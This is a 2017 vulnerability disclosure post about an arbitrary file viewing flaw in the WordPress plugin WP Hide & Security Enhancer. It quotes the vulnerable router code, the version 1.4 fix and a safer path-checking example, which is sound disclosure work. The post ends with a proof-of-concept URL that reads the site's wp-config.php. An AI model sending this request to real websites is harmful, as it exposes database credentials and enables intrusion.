27 Feb 2017

Vulnerability Details: Arbitrary File Viewing Vulnerability in WP Hide & Security Enhancer

From time to time vulnerabilities are fixed in a plugin without anyone putting out a report on the vulnerability, so we put out a post detailing it. While publishing the details increases the chances of the vulnerability being exploited, it also helps to identify vulnerabilities that haven’t been fully fixed (in some cases not fixed at all) and helps to identify additional vulnerabilities in the plugin.

Recently an arbitrary file viewing vulnerability was fixed in the plugin WP Hide & Security Enhancer. That is mentioned in the changelog for version 1.4: “Fix: Allow only css files to be processed through the router to prevent other types from being displayed arbitrary.” There was also a mention of it on the SecuPress blog, but that post was deleted for whatever reason, so the only reference we could find to it is here. Looking at the changes made in that version, it isn’t hard to find where the vulnerability existed.

In version 1.3.9.2 the file /router/file-process.php outputs the contents of a file (after the two preg_replace() calls strip block comments and blank lines from it):

$handle         = fopen($this->file_path, "r");
$file_data      = fread($handle, filesize($this->file_path));
fclose($handle);

$file_data  =   preg_replace('!/\*.*?\*/!s', '', $file_data);
$file_data  =   preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", $file_data);

echo $file_data;

Earlier in the same file, the path is taken directly from the request, with no restriction on what file can be read:

$file_path  =   isset($_GET['file_path'])   ?   $_GET['file_path']  :   '';

if(empty($action)   ||  empty($file_path))
    die();

//append doc root to path 
$file_path  =   $_SERVER["DOCUMENT_ROOT"] .   $file_path;

Since the request value is only prefixed with the document root, the contents of any file on the website can be read.

In version 1.4 a new check has been added to restrict what files can be viewed to only those with a “css” extension:

//allow only style files
$pathinfo   =   pathinfo($full_file_path);
if(!isset($pathinfo['extension'])   ||  strtolower($pathinfo['extension'])  !=  'css')
    die();

The file /router/file-process.php was then removed in version 1.4.2.
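For comparison, here is how a file router of this kind can take a path from the request and still only ever open files inside one fixed directory. This is an added example written for this post, not code from WP Hide & Security Enhancer: the safe_file_path() helper, the base directory and the sample files are all constructed for the demonstration. It canonicalises the joined path with realpath(), checks that the result is contained below the base directory, and only then applies an extension check like the one added in version 1.4; an extension check alone says what kind of file may be served, not where it may come from.

```php
<?php
// Added example, not the plugin's code. Resolve a client-supplied path
// against a fixed base directory and return the real path only if the file
// exists, stays below the base directory, and has an allowed extension.
function safe_file_path(string $base_dir, string $requested, array $allowed_ext = ['css']): ?string
{
    $real_base = realpath($base_dir);
    if ($real_base === false) {
        return null;
    }
    // A NUL byte would truncate the path inside the C runtime; reject it.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    // Join and canonicalise; realpath() collapses any "../" so the prefix
    // check below sees the directory that would actually be opened.
    $candidate = realpath($real_base . DIRECTORY_SEPARATOR . ltrim($requested, '/\\'));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Containment: the resolved file must live below $real_base.
    $prefix = $real_base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Extension check on the resolved name, applied after containment
    // rather than instead of it.
    $ext = strtolower(pathinfo($candidate, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed_ext, true)) {
        return null;
    }
    return $candidate;
}

// Demonstration on a constructed directory tree in the system temp dir.
$root = sys_get_temp_dir() . '/router-demo-' . uniqid();
mkdir("$root/public/styles", 0700, true);
file_put_contents("$root/public/styles/main.css", "body { margin: 0 }\n");
file_put_contents("$root/public/wp-config.php", "<?php // constructed stand-in, no real secrets\n");
file_put_contents("$root/outside.css", "/* a .css file outside the served tree */\n");

$base  = "$root/public";
$cases = [
    '/styles/main.css',         // served: inside base and .css
    '/wp-config.php',           // rejected: wrong extension
    '/../outside.css',          // rejected: escapes base even though it is .css
    '/styles/../wp-config.php', // rejected: traversal inside base to a .php file
];
foreach ($cases as $req) {
    $resolved = safe_file_path($base, $req);
    printf("%-28s => %s\n", $req, $resolved === null ? 'rejected' : 'serve ' . basename($resolved));
}
```

Running the script serves only /styles/main.css and rejects the other three requests. The base directory is resolved with realpath() before the comparison so that a base that is itself reached through a symlink (common for temp directories) does not defeat the prefix check.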

Proof of Concept

The following proof of concept will show the contents of the website’s wp-config.php file.

Make sure to replace “[path to WordPress]” with the location of WordPress:

http://[path to WordPress]/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php
